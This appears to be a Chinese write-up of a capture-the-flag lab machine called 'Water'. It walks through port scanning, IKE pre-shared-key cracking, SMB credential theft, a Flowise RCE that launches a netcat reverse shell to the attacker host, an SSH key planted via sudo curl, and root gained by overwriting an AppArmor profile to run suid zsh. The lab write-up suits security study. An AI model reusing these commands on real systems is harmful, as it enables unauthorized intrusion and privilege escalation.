群友靶机Water复现
study!
water
nmap -p- 192.168.5.22
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-15 18:50 EST
Nmap scan report for 192.168.5.22 (192.168.5.22)
Host is up (0.00042s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3000/tcp open ppp
MAC Address: 08:00:27:A7:98:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
80端口是静态页面,3000端口有个管理页面需要登录。
是Flowise web应用。80端口跑gobuster没东西。搜了一下有好多cve但是好像都不行也不存在未授权访问。感觉第一步是要去拿到邮箱。
跑一下smbmap发现了一个public文件夹,但是登录不上。
发现是信息收集不够到位。
enum4linux -a 192.168.5.22跑一下用户,发现有111和hungry两个用户。
还需要跑一下UDP流。
跑一下常见的20个UDP端口
nmap 192.168.5.22 -sU --top-ports 20
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-17 10:38 EST
Nmap scan report for 192.168.5.22 (192.168.5.22)
Host is up (0.00070s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp open isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:A7:98:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
注意到500,isakmp。
根据hacktrick进行操作ike-scan -P -M -A -n fakeID 192.168.5.22发现有哈希回显说明可行。发现无论使用什么id回显的hash进行爆破后得到的结果都是一样的。
psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "dodgers125" matches SHA1 hash 6d920ad11b3af79596d3fb83e36e440c20e25977
尝试smb登录。smbclient //192.168.5.22/public -U 111
get noo0ootes.txt拿到一组账密admin Drinkw@terisg00d。尝试用admin@water.dsz(这里可以看做是合理猜测出来的)进行登录,成功。
发现是3.0.4版本,存在RCE。脚本有点问题,小改动一下即可。
python3 flowiseRCE.py --email admin@water.dsz --password Drinkw@terisg00d --url http://192.168.5.22:3000 --cmd "busybox nc 192.168.5.21 6666 -e sh"
反弹上shell,稳定shell,拿到111用户权限。flag{user-Still-waters-run-deep}之后横向至Hungry。curl命令提权。这里可以Fuzz Hungry路径下的文件有哪些然后读取或者写ssh公钥。sudo -u Hungry curl file:///home/Hungry/passwd.txt。个人认为写公钥方式更为普适。
sudo -u Hungry curl http://192.168.5.21/id_rsa.pub -o /home/Hungry/.ssh/authorized_keys --create-dirs
成功横向至Hungry用户。
Hungry@Water:~$ id
uid=1000(Hungry) gid=1000(Hungry) groups=1000(Hungry)
Hungry@Water:~$ ls
passwd.txt
Hungry@Water:~$ cat passwd.txt
好好学习天天向上
Hungry@Water:~$ sudo -l
Matching Defaults entries for Hungry on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hungry may run the following commands on localhost:
(ALL) NOPASSWD: /usr/games/my_pipes
这个my_pipes貌似没有提权的地方。
看一下带有suid权限的,find / -perm -4000 2>/dev/null。
Hungry@Water:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/zsh
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
注意到zsh,然而
Hungry@Water:~$ zsh -p
zsh: error while loading shared libraries: libcap.so.2: cannot open shared object file: No such file or directory
Hungry@Water:~$ find / -name "libcap.so.2" 2>/dev/null
/usr/lib/x86_64-linux-gnu/libcap.so.2
存在这个库但是zsh缺无法导入。
强制导入库
Hungry@Water:~$ /lib64/ld-linux-x86-64.so.2 --library-path /usr/lib/x86_64-linux-gnu /usr/bin/zsh -p
Water% id
uid=1000(Hungry) gid=1000(Hungry) groups=1000(Hungry)
发现这样suid权限就没了。跑linpeas.sh,注意到AppArmor的一条规则
Hungry@Water:~$ cat /etc/apparmor.d/usr.bin.zsh
#include <tunables/global>
/usr/bin/zsh {
# 拒绝所有文件访问(包括库),导致启动失败;默认已 deny 能力/网络
deny /** rwlkxm,
}
那么思路就是去清除掉这个规则。
利用my_pipes中的参数创建空文件覆盖掉这条规则即可。
sudo /usr/games/my_pipes -O /etc/apparmor.d/usr.bin.zsh
重启靶机即可。
Hungry@Water:~$ /usr/bin/zsh -p
Water# id
uid=1000(Hungry) gid=1000(Hungry) euid=0(root) egid=0(root) groups=0(root),1000(Hungry)
Water# cat /root/root.txt
flag{root-A-drop-in-the-ocean}
浙公网安备 33010602011771号